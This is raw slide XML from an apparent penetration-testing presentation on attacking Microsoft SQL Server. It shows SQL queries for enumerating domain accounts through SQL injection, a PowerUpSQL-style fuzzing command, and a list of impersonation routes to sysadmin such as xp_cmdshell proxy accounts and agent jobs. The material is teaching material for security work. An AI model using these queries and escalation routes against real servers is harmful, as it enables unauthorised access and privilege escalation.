              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> case </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>remote</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>based</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{562C36C0-2B0D-1348-913A-B6201F4ACE55}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="3447985"/>
            <a:ext cx="11041227" cy="9543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SELECT DEFAULT_DOMAIN() as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>mydomain</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" sz="1867" dirty="0">
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" defTabSz="1219170"/>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>SELECT SUSER_SID('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>identified_domain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Domain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Admins</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>‘)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" defTabSz="1219170"/>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>SELECT SUSER_NAME(RID)</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" sz="1867" dirty="0">
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA982EB7-D534-8249-8B14-1709C7A41D04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="4944685"/>
            <a:ext cx="11041227" cy="379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&gt;&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Get-SQLFuzzDomainAccount</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> -Instance </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>ComputerName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>InstanceName</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" sz="1867"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6282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78E3-16BC-4E4A-BB50-996C89B39268}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Impersonation</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10F64A83-5E7F-0C4E-9725-477DF06BDDB4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1600202"/>
            <a:ext cx="10972800" cy="1540767"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>The</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>next</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> SQL Server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>feature</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>we</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>can</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>leverage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>gain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>sysadmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>level</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>privileges</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>impersonation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="cs-CZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>There</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> are a lot </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>ways</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>getting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> to run in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>context</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> a user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> has more </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>privileges</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>than</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>we</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>have</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> on SQL Server. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>The</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> most </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>commonly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>used</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>ones</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>following</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="cs-CZ" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D027C8A3-9933-BA44-BAB4-F1043157C9DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="3316565"/>
            <a:ext cx="10972800" cy="2224671"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="121920" tIns="60960" rIns="121920" bIns="60960" numCol="2" rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="342900" indent="-342900" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1400" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="accent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20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10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05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05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buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="03326C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Impersonate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="03326C"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="03326C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Privilege</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="03326C"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457189" indent="-457189" defTabSz="1219170">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="03326C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Stored</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="03326C"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="03326C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Procedure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="03326C"/>
                </a:solidFill>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="03326C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Trigger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="03326C"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="03326C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Creation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="03326C"/>
                </a:solidFill>
              </a:rPr>
              <a:t> / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="03326C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="03326C"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="03326C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Issues</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="03326C"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457189" indent="-457189" defTabSz="1219170">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="03326C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Automatic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="03326C"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="03326C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Execution</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="03326C"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="03326C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="03326C"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="03326C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Stored</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="03326C"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="03326C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Procedures</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="03326C"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457189" indent="-457189" defTabSz="1219170">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="03326C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Agent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="03326C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Jobs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="03326C"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457189" indent="-457189" defTabSz="1219170">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="03326C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="03326C"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="03326C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>proxy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="03326C"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="03326C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>acount</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="03326C"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457189" indent="-457189" defTabSz="1219170">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="03326C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Create</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="03326C"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Database Link to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="03326C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>File</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="03326C"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="03326C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="03326C"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Server </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457189" indent="-457189" defTabSz="1219170">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="03326C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Import / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="03326C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Install</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="03326C"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="03326C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Custom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="03326C"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="03326C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Assemblies</a:t>
            </a:r>
            <a:r>
